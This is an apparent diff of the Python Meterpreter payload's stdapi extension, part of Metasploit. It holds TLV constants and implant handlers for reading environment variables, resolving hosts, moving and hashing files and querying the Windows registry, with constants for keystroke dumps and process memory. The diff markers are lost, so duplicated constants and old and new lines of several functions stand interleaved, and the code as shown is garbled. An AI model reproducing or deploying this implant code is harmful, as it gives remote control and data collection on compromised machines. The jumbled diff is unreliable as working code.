TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
##
# Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
##
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
##
# Registry
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
# Config
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
##
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
##
# Environment
##
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
TLV_TYPE_ENV_VALUE = TLV_META_TYPE_STRING | 1101
TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102
DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
##
# Process
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
##
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
##
# Ui
##
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
##
# Event Log
##
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
##
# Power
##
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
##
# Sys
@ -273,6 +290,9 @@ ERROR_FAILURE = 1
# errors.
ERROR_CONNECTION_ERROR = 10000
WIN_AF_INET = 2
WIN_AF_INET6 = 23
def get_stat_buffer(path):
si = os.stat(path)
rdev = 0
@ -290,6 +310,27 @@ def get_stat_buffer(path):
st_buf += struct.pack('<II', blksize, blocks)
return st_buf
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
def resolve_host(hostname, family):
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
family = address_info[0]
address = address_info[4][0]
return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
def windll_GetNativeSystemInfo():
if not has_windll:
return None
@ -341,6 +382,18 @@ def stdapi_sys_config_getuid(request, response):
response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getenv(request, response):
for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
pgroup = ''
env_var = env_var['value'].translate(None, '%$')
env_val = os.environ.get(env_var)
if env_val:
pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_sysinfo(request, response):
uname_info = platform.uname()
@ -580,20 +633,28 @@ def stdapi_fs_delete_file(request, response):
@meterpreter.register_function
def stdapi_fs_file_expand_path(request, response):
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
if path_tlv == '%COMSPEC%':
if platform.system() == 'Windows':
result = 'cmd.exe'
else:
result = '/bin/sh'
elif path_tlv in ['%TEMP%', '%TMP%'] and platform.system() != 'Windows':
if has_windll:
path_out = (ctypes.c_char * 4096)()
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
result = ''.join(path_out)[:path_out_len]
elif path_tlv == '%COMSPEC%':
result = '/bin/sh'
elif path_tlv in ['%TEMP%', '%TMP%']:
result = '/tmp'
else:
result = os.getenv(path_tlv)
result = os.getenv(path_tlv, path_tlv)
if not result:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_FILE_PATH, result)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_file_move(request, response):
oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
os.rename(oldname, newname)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_getwd(request, response):
response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
@ -622,7 +683,7 @@ def stdapi_fs_md5(request, response):
m = hashlib.md5()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
return ERROR_SUCCESS, response
@meterpreter.register_function
@ -669,7 +730,7 @@ def stdapi_fs_sha1(request, response):
m = hashlib.sha1()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
return ERROR_SUCCESS, response
@meterpreter.register_function
@ -679,6 +740,40 @@ def stdapi_fs_stat(request, response):
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_host(request, response):
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
result = resolve_host(hostname, family)
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_hosts(request, response):
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
hostname = hostname['value']
try:
result = resolve_host(hostname, family)
except socket.error:
result = {'family':family, 'packed_address':''}
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_socket_tcp_shutdown(request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
@ -834,9 +929,12 @@ def stdapi_registry_query_value(request, response):
if value_type.value == REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
elif value_type.value == REG_DWORD:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
value = value_data[:4]
value.reverse()
value = ''.join(map(chr, value))
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
return ERROR_SUCCESS, response
return ERROR_FAILURE, response

Some files were not shown because too many files have changed in this diff Show More